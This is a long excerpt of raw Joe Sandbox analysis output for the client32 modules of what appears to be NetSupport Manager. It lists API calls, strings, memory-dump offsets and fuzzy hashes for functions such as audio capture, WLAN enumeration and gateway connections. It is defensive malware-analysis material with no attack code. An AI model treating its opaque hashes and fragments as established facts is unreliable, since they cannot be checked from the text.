                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection_free$EnterLeave__wcstoui64_strncatctl_getsessionstrtoxl
                                                                                                • String ID: 445817$CLIENT_NAME=%s$CMD=CONNECT_REPLY$CONNECTION_ID$CONNECTION_ID=%u$CONTROL_ADDR$CONTROL_NAME$NC_$RESULT=%d
                                                                                                • API String ID: 1400833098-4076260567
                                                                                                • Opcode ID: 0d24102a68e323ad29a82423749b8a1d2790be82eb12c5618b772d7527612f3b
                                                                                                • Instruction ID: 80287fac870def5465933d3d390110ccb045b0595a0fc78aa4747b1b62b5d079
                                                                                                • Opcode Fuzzy Hash: 0d24102a68e323ad29a82423749b8a1d2790be82eb12c5618b772d7527612f3b
                                                                                                • Instruction Fuzzy Hash: 9E716FB5D00248AFDB10DFE8EC81BAEBBB8AF49314F549439E506E7240F77599058BA1
                                                                                                APIs
                                                                                                  • Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                                  • Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                                  • Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                                  • Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                                  • Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                                                • GetDlgItem.USER32(00000000,00000001), ref: 1103944A
                                                                                                • EnableWindow.USER32(00000000,00000000), ref: 1103944F
                                                                                                • _calloc.LIBCMT ref: 1103945C
                                                                                                • GetSystemMenu.USER32 ref: 11039490
                                                                                                • EnableMenuItem.USER32 ref: 1103949E
                                                                                                • GetDlgItem.USER32(00000000,0000044E), ref: 110394BC
                                                                                                • SetWindowPos.USER32(00000000,00000001,00000000,00000000,00000000,00000000,00000043), ref: 11039509
                                                                                                • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000043), ref: 11039538
                                                                                                • UpdateWindow.USER32 ref: 11039567
                                                                                                • BringWindowToTop.USER32(?), ref: 1103956E
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                  • Part of subcall function 1115FFC0: SetForegroundWindow.USER32(?), ref: 1115FFEE
                                                                                                • MessageBeep.USER32(000000FF,00000001), ref: 1103957F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Window$Item$EnableMenuMessage$BeepBringErrorExitForegroundLastObjectProcessRectShowSystemTextUpdate_callocwsprintf
                                                                                                • String ID: CLTCONN.CPP$e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd$m_nc
                                                                                                • API String ID: 4191401721-1182766118
                                                                                                • Opcode ID: 51b6937d982a358fdf259d5baecad387e1d1d56d4f23d55ad49fb18189202900
                                                                                                • Instruction ID: fea8d420f6ab3010a63bc2930e21c2de0d8b75aa48f279369a9769ea0f724755
                                                                                                • Opcode Fuzzy Hash: 51b6937d982a358fdf259d5baecad387e1d1d56d4f23d55ad49fb18189202900
                                                                                                • Instruction Fuzzy Hash: 0C411AB9B803157BE7209761DC87F9AF398AB84B1CF104434F3267B6C0EAB5B4408759
                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(111F3420,?,00000000,00000000,?,110CB60A,1105E75F,?,00000000,?,110BE929,00000000,00000000,?,1105E75F,?), ref: 110CB45E
                                                                                                • RegisterClipboardFormatA.USER32(WM_ATLGETHOST), ref: 110CB46F
                                                                                                • RegisterClipboardFormatA.USER32(WM_ATLGETCONTROL), ref: 110CB47B
                                                                                                • GetClassInfoExA.USER32(11000000,AtlAxWin100,?), ref: 110CB4A0
                                                                                                • LoadCursorA.USER32(00000000,00007F00), ref: 110CB4D1
                                                                                                • RegisterClassExA.USER32 ref: 110CB4F2
                                                                                                • _memset.LIBCMT ref: 110CB51B
                                                                                                • GetClassInfoExA.USER32(11000000,AtlAxWinLic100,?), ref: 110CB536
                                                                                                • LoadCursorA.USER32(00000000,00007F00), ref: 110CB56B
                                                                                                • RegisterClassExA.USER32 ref: 110CB58C
                                                                                                • LeaveCriticalSection.KERNEL32(111F3420,0000000E), ref: 110CB5B5
                                                                                                • LeaveCriticalSection.KERNEL32(111F3420,?,?,?,?,110CB60A,1105E75F,?,00000000,?,110BE929,00000000,00000000,?,1105E75F,?), ref: 110CB5CB
                                                                                                  • Part of subcall function 110C2C00: __recalloc.LIBCMT ref: 110C2C48
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ClassRegister$CriticalSection$ClipboardCursorFormatInfoLeaveLoad$Enter__recalloc_memset
                                                                                                • String ID: AtlAxWin100$AtlAxWinLic100$WM_ATLGETCONTROL$WM_ATLGETHOST
                                                                                                • API String ID: 2220097787-1587594278
                                                                                                • Opcode ID: 8be8c82d578b7ce9cf9cc495cb365543be575607f387d856cefed87b35aa24b4
                                                                                                • Instruction ID: 380367346e18165f725bae6bc82d4f79de56b371e9301c8febdab5dbf058e0d0
                                                                                                • Opcode Fuzzy Hash: 8be8c82d578b7ce9cf9cc495cb365543be575607f387d856cefed87b35aa24b4
                                                                                                • Instruction Fuzzy Hash: 854179B5D02229ABCB01DFD9E984AEEFFB9FB48714F50406AE415B3200DB351A44CFA4
                                                                                                APIs
                                                                                                • _calloc.LIBCMT ref: 1104702F
                                                                                                • wsprintfA.USER32 ref: 110470AE
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                • wsprintfA.USER32 ref: 110470E9
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,00000014,00000080), ref: 11047203
                                                                                                • _strrchr.LIBCMT ref: 1104720C
                                                                                                • GetWindowsDirectoryA.KERNEL32(00000016,00000080), ref: 11047235
                                                                                                • _free.LIBCMT ref: 11047251
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: wsprintf$DirectoryErrorExitFileLastMessageModuleNameProcessWindows_calloc_free_strrchr
                                                                                                • String ID: %s %s$CLTCONN.CPP$NSA %s$NSS$V1.10$V12.00$V12.10$V12.10F20
                                                                                                APIs
                                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                • _malloc.LIBCMT ref: 1100B496
                                                                                                  • Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
                                                                                                  • Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
                                                                                                  • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
                                                                                                  • Part of subcall function 1100AD10: EnterCriticalSection.KERNEL32(000000FF,986DAFD2,?,00000000,00000000), ref: 1100AD54
                                                                                                  • Part of subcall function 1100AD10: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1100AD72
                                                                                                  • Part of subcall function 1100AD10: GetProcAddress.KERNEL32(?,CancelIo), ref: 1100ADBE
                                                                                                  • Part of subcall function 1100AD10: InterlockedExchange.KERNEL32(?,000000FF), ref: 1100AE05
                                                                                                  • Part of subcall function 1100AD10: CloseHandle.KERNEL32(00000000), ref: 1100AE0C
                                                                                                  • Part of subcall function 1100AD10: _free.LIBCMT ref: 1100AE23
                                                                                                  • Part of subcall function 1100AD10: FreeLibrary.KERNEL32(?), ref: 1100AE3B
                                                                                                  • Part of subcall function 1100AD10: LeaveCriticalSection.KERNEL32(?), ref: 1100AE45
                                                                                                • EnterCriticalSection.KERNEL32(1100CB8A,Audio,DisableSounds,00000000,00000000,986DAFD2,?,1100CB7A,00000000,?,1100CB7A,?), ref: 1100B4CB
                                                                                                • CreateFileA.KERNEL32(\\.\NSAudioFilter,C0000000,00000000,00000000,00000003,40000000,00000000), ref: 1100B4E8
                                                                                                • _calloc.LIBCMT ref: 1100B519
                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,1100CB7A,?), ref: 1100B53F
                                                                                                • LeaveCriticalSection.KERNEL32(1100CB8A,?,1100CB7A,?), ref: 1100B579
                                                                                                • LeaveCriticalSection.KERNEL32(1100CB7A,?,?,1100CB7A,?), ref: 1100B59E
                                                                                                Strings
                                                                                                • \\.\NSAudioFilter, xrefs: 1100B4E0
                                                                                                • DisableSounds, xrefs: 1100B472
                                                                                                • Error. Vista AddAudioCaptureEventListener ret %s, xrefs: 1100B64C
                                                                                                • Vista new pAudioCap=%p, xrefs: 1100B603
                                                                                                • InitCaptureSounds NT6, xrefs: 1100B5BE
                                                                                                • Audio, xrefs: 1100B477
                                                                                                • Error. Vista AudioCapture GetInstance ret %s, xrefs: 1100B5F3
                                                                                                • Vista AddAudioCapEvtListener(%p), xrefs: 1100B623
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$Leave$CreateEnterLibrary$AddressAllocateCloseEventExchangeFileFreeHandleHeapInterlockedLoadProc__wcstoi64_calloc_free_malloc
                                                                                                • String ID: Audio$DisableSounds$Error. Vista AudioCapture GetInstance ret %s$Error. Vista AddAudioCaptureEventListener ret %s$InitCaptureSounds NT6$Vista AddAudioCapEvtListener(%p)$Vista new pAudioCap=%p$\\.\NSAudioFilter
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memmove$Xinvalid_argumentstd::_
                                                                                                • String ID: invalid string position$string too long
                                                                                                APIs
                                                                                                  • Part of subcall function 69CFDBD0: _malloc.LIBCMT ref: 69CFDBE9
                                                                                                  • Part of subcall function 69CFDBD0: wsprintfA.USER32 ref: 69CFDC04
                                                                                                  • Part of subcall function 69CFDBD0: _memset.LIBCMT ref: 69CFDC27
                                                                                                • getpeername.WSOCK32(?,?,?), ref: 69CF2198
                                                                                                • htons.WSOCK32(?), ref: 69CF21A9
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898,69D20E3D,?,?,?,?), ref: 69CF21D9
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898,?,?,?,?), ref: 69CF220C
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898,69D20E3D,?,?,?,?), ref: 69CF2217
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898,?,?,?,?), ref: 69CF2227
                                                                                                • std::exception::exception.LIBCMT ref: 69CF226B
                                                                                                • __CxxThrowException@8.LIBCMT ref: 69CF2286
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeave$Exception@8Throw_malloc_memsetgetpeernamehtonsstd::exception::exceptionwsprintf
                                                                                                • String ID: FNAME$FSIZE$LINK$LWT$RESULT$SUB
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memset$Library$AddressFreeLoadProcwsprintf
                                                                                                • String ID: RAS$%02x%02x%02x%02x%02x%02x$* $3$DEST$Netbios$netapi32.dll
                                                                                                APIs
                                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                • LoadLibraryA.KERNEL32(wlanapi.dll), ref: 1115B61B
                                                                                                • GetProcAddress.KERNEL32(00000000,WlanOpenHandle,?,?,?,11058627), ref: 1115B634
                                                                                                • GetProcAddress.KERNEL32(?,WlanCloseHandle,?,?,?,11058627), ref: 1115B644
                                                                                                • GetProcAddress.KERNEL32(?,WlanEnumInterfaces,?,?,?,11058627), ref: 1115B654
                                                                                                • GetProcAddress.KERNEL32(?,WlanGetAvailableNetworkList,?,?,?,11058627), ref: 1115B664
                                                                                                • GetProcAddress.KERNEL32(?,WlanFreeMemory,?,?,?,11058627), ref: 1115B674
                                                                                                • std::exception::exception.LIBCMT ref: 1115B68D
                                                                                                • __CxxThrowException@8.LIBCMT ref: 1115B6A2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressProc$Exception@8LibraryLoadThrow_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                • String ID: WlanCloseHandle$WlanEnumInterfaces$WlanFreeMemory$WlanGetAvailableNetworkList$WlanOpenHandle$wlanapi.dll
                                                                                                • API String ID: 2439742961-1736626566
                                                                                                • Opcode ID: 2608c12448893da24d69e8b4b9b33c57e694c25a5452fefb97775b225fa14a79
                                                                                                • Instruction ID: ed2c7270a583f493e0b466c25834e96d487c817f3cd2eef84f0062ec4251f30e
                                                                                                • Opcode Fuzzy Hash: 2608c12448893da24d69e8b4b9b33c57e694c25a5452fefb97775b225fa14a79
                                                                                                • Instruction Fuzzy Hash: 1721CEB9A013249FC350DFA9CC80A9AFBF8AF58204B14892EE42AD3605E771E400CB95
                                                                                                APIs
                                                                                                  • Part of subcall function 1111F440: SelectPalette.GDI32(?,?,00000000), ref: 1111F4BC
                                                                                                  • Part of subcall function 1111F440: SelectPalette.GDI32(?,?,00000000), ref: 1111F4D1
                                                                                                  • Part of subcall function 1111F440: DeleteObject.GDI32(?), ref: 1111F4E4
                                                                                                  • Part of subcall function 1111F440: DeleteObject.GDI32(?), ref: 1111F4F1
                                                                                                  • Part of subcall function 1111F440: DeleteObject.GDI32(?), ref: 1111F516
                                                                                                • _free.LIBCMT ref: 1112131D
                                                                                                  • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000), ref: 11163ABB
                                                                                                  • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                                • _free.LIBCMT ref: 11121333
                                                                                                • _free.LIBCMT ref: 11121348
                                                                                                • GdiFlush.GDI32 ref: 11121350
                                                                                                • _free.LIBCMT ref: 1112135D
                                                                                                • _free.LIBCMT ref: 11121371
                                                                                                • SelectObject.GDI32(?,?), ref: 1112138D
                                                                                                • DeleteObject.GDI32(?), ref: 1112139A
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,021280F8), ref: 111213A4
                                                                                                • DeleteDC.GDI32(?), ref: 111213CB
                                                                                                • ReleaseDC.USER32(?,?), ref: 111213DE
                                                                                                • DeleteDC.GDI32(?), ref: 111213EB
                                                                                                • InterlockedDecrement.KERNEL32(111EA9C8,?,?,?,?,?,021280F8), ref: 111213F8
                                                                                                Strings
                                                                                                • Error deleting membm, e=%d, xrefs: 111213AB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Delete$Object_free$Select$ErrorLastPalette$DecrementFlushFreeHeapInterlockedRelease
                                                                                                • String ID: Error deleting membm, e=%d
                                                                                                • API String ID: 3195047866-709490903
                                                                                                • Opcode ID: 856a3ecf5a1c88381e43c7b3755e2998f31a2ff9e92ea80af61142ad3529f9f4
                                                                                                • Instruction ID: f7d3d32e9876efa9dbc162a5d98189d6a342c9de11ba00d9e1d1e6b63679a2c9
                                                                                                • Opcode Fuzzy Hash: 856a3ecf5a1c88381e43c7b3755e2998f31a2ff9e92ea80af61142ad3529f9f4
                                                                                                • Instruction Fuzzy Hash: 892144B96107019BD214DFB5D9C8A9BF7E8FF98319F10491CE9AE83204EB35B501CB65
                                                                                                APIs
                                                                                                  • Part of subcall function 69CFDBD0: _malloc.LIBCMT ref: 69CFDBE9
                                                                                                  • Part of subcall function 69CFDBD0: wsprintfA.USER32 ref: 69CFDC04
                                                                                                  • Part of subcall function 69CFDBD0: _memset.LIBCMT ref: 69CFDC27
                                                                                                • _memset.LIBCMT ref: 69CF0FAD
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898,69D20E3D,?,?,?,?,?,?,00000000), ref: 69CF1293
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898,?,?,?,?,?,?,00000000), ref: 69CF12E3
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898,69D20E3D,?,?,?,?,?,?,00000000), ref: 69CF1316
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898,?,?,?,?,?,?,00000000), ref: 69CF132D
                                                                                                • std::exception::exception.LIBCMT ref: 69CF135B
                                                                                                • __CxxThrowException@8.LIBCMT ref: 69CF1376
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeave_memset$Exception@8Throw_mallocstd::exception::exceptionwsprintf
                                                                                                • String ID: CAP$ENC$END_REC$FLG$MORE$RESULT$TIM$TXT$UID$b
                                                                                                • API String ID: 275297366-914382535
                                                                                                • Opcode ID: 4b2306f60f5fc740bf1ff3eef3d4172e2a1d727ff2e46f580703372a99c14d7b
                                                                                                • Instruction ID: 601bc693f29bdd1152f39ad6527c2caa0520846c4975b91e680bc9801223bf07
                                                                                                • Opcode Fuzzy Hash: 4b2306f60f5fc740bf1ff3eef3d4172e2a1d727ff2e46f580703372a99c14d7b
                                                                                                • Instruction Fuzzy Hash: 7E91B3F5C012599BDF90CFA4AC41AEEB6B4BF0030CF40517AE50AE6601F7354B9ACB56
                                                                                                APIs
                                                                                                • GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                                • GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                                • GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                                • GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 110CF2FC
                                                                                                • GetClientRect.USER32(00000000,?), ref: 110CF3C3
                                                                                                • CreateWindowExA.USER32 ref: 110CF400
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Window$Rect$ClientCreateItemLongObjectShowText
                                                                                                • String ID: ..\ctl32\nsmdlg.cpp$Static$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_eh$m_hWnd
                                                                                                • API String ID: 4172769820-2231854162
                                                                                                • Opcode ID: f5576ccba4c09612635a98adb9a4707c3fcf05e1d93d5abc5032e00a4d5d8499
                                                                                                • Instruction ID: 2d84ac58a4c57407e54c3cb5711102d4444eebaf719169cc73b89b5b27c55d8a
                                                                                                • Opcode Fuzzy Hash: f5576ccba4c09612635a98adb9a4707c3fcf05e1d93d5abc5032e00a4d5d8499
                                                                                                • Instruction Fuzzy Hash: 8F81C375E00716ABD721CF64CC85F9EB3F4BB88B08F0045ADE5569B680EB74A940CF92
                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(0000017D,986DAFD2,0000017D,?,?,?,?,?,?,?,?,1118B168,000000FF,?,1110F947,00000001), ref: 1110F427
                                                                                                • _memset.LIBCMT ref: 1110F4C2
                                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 1110F4FA
                                                                                                • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1110F58E
                                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 1110F5B9
                                                                                                • WriteFile.KERNEL32(?,PCIR,00000030,?,00000000), ref: 1110F5CE
                                                                                                  • Part of subcall function 11110000: InterlockedDecrement.KERNEL32(?,?,00000000,110C1126,00000000,00000000,00000000,00000000,?,1105E793,00000001,00000001,?,00000000), ref: 11110008
                                                                                                • CloseHandle.KERNEL32(?), ref: 1110F5F5
                                                                                                • _free.LIBCMT ref: 1110F628
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 1110F665
                                                                                                • timeEndPeriod.WINMM(00000001), ref: 1110F677
                                                                                                • LeaveCriticalSection.KERNEL32(0000017D,?,?,?,?,?,?,?,1118B168,000000FF,?,1110F947,00000001,986DAFD2,0000017D,00000001), ref: 1110F681
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CloseCriticalHandlePointerSectionWrite$DecrementEnterInterlockedLeavePeriod_free_memsettime
                                                                                                • String ID: End Record %s$PCIR
                                                                                                • API String ID: 4278564793-2672865668
                                                                                                • Opcode ID: 2297d0fbe9251eaeeb3cc25f45a368d5b625df3f620643443588fc5d57948bb5
                                                                                                • Instruction ID: c7b3bd1ea8319edfd3cc52dfdc755cda258f2b25611d18eaf89bf58ef2166273
                                                                                                • Opcode Fuzzy Hash: 2297d0fbe9251eaeeb3cc25f45a368d5b625df3f620643443588fc5d57948bb5
                                                                                                • Instruction Fuzzy Hash: 32811875A0070AABD724CFA4C881BEBF7F8FF88704F00492DE66A97240D775A941CB91
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(Wtsapi32.dll), ref: 110F711B
                                                                                                • GetProcAddress.KERNEL32(00000000,WTSQuerySessionInformationA), ref: 110F7179
                                                                                                • wsprintfA.USER32 ref: 110F7235
                                                                                                • SetLastError.KERNEL32(00000078), ref: 110F7242
                                                                                                • wsprintfA.USER32 ref: 110F7267
                                                                                                • GetProcAddress.KERNEL32(?,WTSFreeMemory), ref: 110F72A7
                                                                                                • SetLastError.KERNEL32(00000078), ref: 110F72BC
                                                                                                • FreeLibrary.KERNEL32(?), ref: 110F72D0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressErrorLastLibraryProcwsprintf$FreeLoad
                                                                                                • String ID: %u.%u.%u.%u$%x:%x:%x:%x:%x:%x:%x:%x$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll
                                                                                                • API String ID: 856016564-3838485836
                                                                                                APIs
                                                                                                  • Part of subcall function 69CF7BE0: _memset.LIBCMT ref: 69CF7BFF
                                                                                                  • Part of subcall function 69CF7BE0: _strncpy.LIBCMT ref: 69CF7C0B
                                                                                                • __wcstoui64.LIBCMT ref: 69CE9EF8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __wcstoui64_memset_strncpy
                                                                                                • String ID: 1.0$CMPI$FAILED_REASON$Gateway rejected client connection because licence was exceeded.$Gateway rejected client connection because security check failed.$MAC$MAXPACKET$PROTOCOL_VER$RESULT$SERVER_VERSION$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$strlen(p) == 12
                                                                                                • API String ID: 2670788892-1257448691
                                                                                                APIs
                                                                                                • UnDecorator::getBasicDataType.LIBCMT ref: 69D1C388
                                                                                                • DName::operator=.LIBCMT ref: 69D1C39C
                                                                                                • DName::operator+=.LIBCMT ref: 69D1C3AA
                                                                                                • UnDecorator::getPtrRefType.LIBCMT ref: 69D1C3D6
                                                                                                • UnDecorator::getDataIndirectType.LIBCMT ref: 69D1C453
                                                                                                • UnDecorator::getBasicDataType.LIBCMT ref: 69D1C45C
                                                                                                • operator+.LIBCMT ref: 69D1C4EF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Decorator::getType$Data$Basic$IndirectName::operator+=Name::operator=operator+
                                                                                                • String ID: std::nullptr_t$volatile
                                                                                                • API String ID: 2203807771-3726895890
                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 69CEC158
                                                                                                  • Part of subcall function 69D01BFD: HeapFree.KERNEL32(00000000,00000000), ref: 69D01C13
                                                                                                  • Part of subcall function 69D01BFD: GetLastError.KERNEL32(00000000), ref: 69D01C25
                                                                                                • _free.LIBCMT ref: 69CEC1A2
                                                                                                • _free.LIBCMT ref: 69CEC1E8
                                                                                                • _free.LIBCMT ref: 69CEC21C
                                                                                                  • Part of subcall function 69CE5060: _free.LIBCMT ref: 69CE506A
                                                                                                  • Part of subcall function 69CE5060: _malloc.LIBCMT ref: 69CE5090
                                                                                                  • Part of subcall function 69CF7D00: __vswprintf.LIBCMT ref: 69CF7D26
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast__vswprintf_malloc
                                                                                                • String ID: AT=%d$CAP=%s$DEP=%s$FMASK=%d$FROM=%I64u$MAX=%d$ORO=%s$ORU=%s$TO=%I64u
                                                                                                • API String ID: 3180605519-2647812726
                                                                                                APIs
                                                                                                • SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 11025036
                                                                                                • SendMessageA.USER32(?,000000BA,00000000,00000000), ref: 11025049
                                                                                                • SendMessageA.USER32(?,000000BB,-00000001,00000000), ref: 1102505A
